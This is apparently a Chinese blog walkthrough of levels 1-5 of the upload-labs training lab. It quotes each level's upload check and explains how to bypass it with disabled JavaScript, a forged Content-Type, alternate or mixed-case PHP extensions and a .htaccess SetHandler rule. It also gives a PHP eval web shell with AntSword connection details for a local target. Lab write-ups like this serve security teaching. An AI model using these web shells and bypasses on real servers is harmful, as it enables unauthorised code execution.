upload-labs(1-5)

Created at 2018-07-11 Updated at 2018-07-12 Tag web

lalala

Pass-01:

Pass-01源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function checkFile() {
  var file = document.getElementsByName('upload_file')[0].value;
  if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
  }
  //定义允许上传的文件类型
  var allow_ext = ".jpg|.png|.gif";
  //提取上传文件的类型
  var ext_name = file.substring(file.lastIndexOf("."));
  //判断上传文件类型是否允许上传
  if (allow_ext.indexOf(ext_name + "|") == -1) {
  var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
  }
}

这个是js的代码,允许上传的类型是.jpg,.png,.gif的文件
提示:

客户端JS检测

  1. 禁用js,上传.php文件(我用的是这个,因为懒)

  2. 先在本地改成符合的图片格式,然后抓包改回成.php文件

按F12打开查看器,找到上传的路径

Pass-02:

Pass-02源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {

    if (file_exists($UPLOAD_ADDR)) {
	
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
		//判断类型为.jpeg,.png,.gif
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], 
			$UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
			//判断文件是否上传
             $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
             $is_upload = true;
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';
    }
}

提示:

根据提示,MIME检测

上传一个.php文件,然后抓包,然后将Content-Type的application/octet-stream改成image/jpeg或者image/png或者image/gif

上传成功

Pass-03:

Pass-03源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {

if (file_exists($UPLOAD_ADDR)) {
       $deny_ext = array('.asp','.aspx','.php','.jsp');
	//黑名单
       $file_name = trim($_FILES['upload_file']['name']);
	//trim() 函数移除字符串两侧的空白字符或其他预定义字符。
	//如果省略,就移除"\0"、"\t"、"\n"、"\x0B"(垂直制表符)、"\t"、""(空格)
       $file_name = deldot($file_name);
	//删除文件名末尾的点
       $file_ext = strrchr($file_name, '.');
	//从文件名字符串中最后出现'.'的位置开始,到末尾,即获取后缀名
       $file_ext = strtolower($file_ext); 
	//转换为小写
       $file_ext = str_ireplace('::$DATA', '', $file_ext);
	//去除字符串::$DATA
       $file_ext = trim($file_ext); 
	//收尾去空
       if(!in_array($file_ext, $deny_ext)) {
	//不在黑名单中
           if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) {
           $img_path = $UPLOAD_ADDR .'/'. $_FILES['upload_file']['name'];
			//上传路径为****/上传文件名
                $is_upload = true;
          }
      } else {
           $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
       }
   } else {
       $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
	}
}

黑名单检测

检测的名单是’.asp’,’.aspx’,’.php’,’.jsp’
大小写,加空格绕过方式不行,可以用不在黑名单列表中的后缀名,例如:php5,php7等等;也可以用.htaccess重写文件解析规则绕过

(htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。)

①利用不在黑名单中的后缀名绕过
上传一个内容为<?php @eval($_POST['a']); ?>,后缀名改成php5的文件,上传成功后连蚁剑:

shell url:http://127.0.0.1/upload-labs/upload/eval03.php5

shell pwd:a

然后……

②.htaccess重写文件解析规则绕过:

  1. 创建htaccess文件,编辑内容为:

    <FilesMatch "eval03">
    SetHandler application/x-httpd-php
    </FilesMatch>

  2. 然后再上传eval03.jpg的木马, 这样eval03.jpg就可解析为php文件。

  3. 上传成功后,在蚁剑里shell url里写 http://127.0.0.1/upload-labs/upload/eval03.jpg,shell pwd里写 a,然后…….

Pass-04

Pass-04源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

黑名单检测

检测的名单有很多,大小写,加空格绕过方式不行,将后缀名改成php5、php7等等也不行,可以用.htaccess重写文件解析规则绕过,如上题

Pass-05

Pass-05源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

黑名单检测
这次检测没有大小写转化,因此可以将文件后缀名改成部分大写绕过

上传成功

蚁剑:shell url:http://127.0.0.1/upload-labs/upload/eval05.PhP

shell pwd:a

Table of Content

  1. Pass-01:
    1. Pass-01源码:
  2. Pass-02:
    1. Pass-02源码:
  3. Pass-03:
    1. Pass-03源码:
  4. Pass-04
    1. Pass-04源码:
  5. Pass-05
    1. Pass-05源码:
Site by 9527 using Hexo & Random

Hide